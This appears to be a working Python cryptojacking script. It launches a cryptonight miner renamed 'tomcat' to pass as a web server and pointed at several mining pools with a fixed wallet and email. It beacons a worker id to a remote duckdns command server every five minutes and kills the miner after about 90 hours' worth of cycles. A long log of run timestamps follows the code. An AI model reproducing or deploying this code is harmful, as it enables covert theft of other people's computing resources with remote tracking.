import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:02:04.607735
#2018-02-17 16:50:01.310325
#2018-02-17 18:38:06.255879
#2018-02-17 20:26:01.687688
#2018-02-17 22:13:06.099757
#2018-02-17 23:57:06.192625
#2018-02-18 01:48:01.705741
#2018-02-18 03:34:06.369271
#2018-02-18 05:22:03.620849
#2018-02-18 07:13:06.983742
#2018-02-18 09:01:06.180104
#2018-02-18 10:48:06.856188
#2018-02-18 12:36:03.766260
#2018-02-18 14:22:05.604203
#2018-02-18 16:13:03.511474
#2018-02-18 18:01:06.992866
#2018-02-18 19:48:04.349853
#2018-02-18 21:34:04.996310
#2018-02-18 23:23:04.351639
#2018-02-19 01:11:07.024702
#2018-02-19 02:57:06.179082
#2018-02-19 04:44:07.507818
#2018-02-19 06:28:04.043376
#2018-02-19 08:18:03.864669
#2018-02-19 10:07:01.316342
#2018-02-19 11:56:05.094048
#2018-02-19 13:43:01.366087
#2018-02-19 15:31:06.674879
#2018-02-19 17:19:07.065888
#2018-02-19 19:06:06.133234
#2018-02-19 20:51:07.469401
#2018-02-19 22:39:01.409429
#2018-02-20 00:23:04.355002
#2018-02-20 02:11:01.834604
#2018-02-20 04:03:01.699860
#2018-02-20 05:46:04.127423
#2018-02-20 07:31:06.262707
#2018-02-20 09:16:01.247498
#2018-02-20 10:59:05.658786
#2018-02-20 12:47:04.397714
#2018-02-20 14:31:07.855992
#2018-02-20 16:15:07.800497
#2018-02-20 18:01:13.157770
#2018-02-20 19:53:06.483094
#2018-02-20 21:42:08.298503
#2018-02-20 23:27:02.203300
#2018-02-21 01:11:07.571538
#2018-02-21 02:58:01.768517
#2018-02-21 04:46:01.808519
#2018-02-21 06:36:05.833104
#2018-02-21 08:22:06.600665
#2018-02-21 10:07:01.940990
#2018-02-21 11:54:13.688307
#2018-02-21 13:45:01.433459
#2018-02-21 15:29:06.548171
#2018-02-21 17:19:09.358711
#2018-02-21 19:09:07.292890
#2018-02-21 20:57:07.908153
#2018-02-21 22:45:08.335600
#2018-02-22 00:34:07.744032
#2018-02-22 02:23:06.794459
#2018-02-22 04:09:07.972673
#2018-02-22 05:54:05.357173
#2018-02-22 07:40:03.832229
#2018-02-22 09:28:03.559754
#2018-02-22 11:14:01.332022
#2018-02-22 13:00:01.672676
#2018-02-22 14:48:11.991514
#2018-02-22 16:34:07.521958
#2018-02-22 18:19:04.958298
#2018-02-22 20:09:02.180084
#2018-02-22 21:56:06.056448
#2018-02-22 23:43:01.939376
#2018-02-23 01:31:04.862324
#2018-02-23 03:18:07.130729
#2018-02-23 05:06:06.720768
#2018-02-23 06:51:05.151904
#2018-02-23 08:41:04.921762
#2018-02-23 10:56:08.723133
#2018-02-23 12:53:03.846058
#2018-02-23 14:37:06.660529
#2018-02-23 16:27:01.540143
#2018-02-23 18:13:07.246516
#2018-02-23 19:59:08.918743
#2018-02-23 21:42:01.736605
#2018-02-23 23:33:06.338516
#2018-02-24 01:22:07.961481
#2018-02-24 03:14:05.839894
#2018-02-24 04:59:01.564992
#2018-02-24 06:46:04.586776
#2018-02-24 08:37:05.897518
#2018-02-24 10:22:05.016363
#2018-02-24 12:17:07.544214
#2018-02-24 14:10:04.190216
#2018-02-24 15:56:06.946735
#2018-02-24 17:48:01.701344
#2018-02-24 19:36:03.824738
#2018-02-24 21:23:06.403557
#2018-02-25 01:15:09.063977
#2018-02-25 05:11:02.073959
#2018-02-25 10:49:02.060911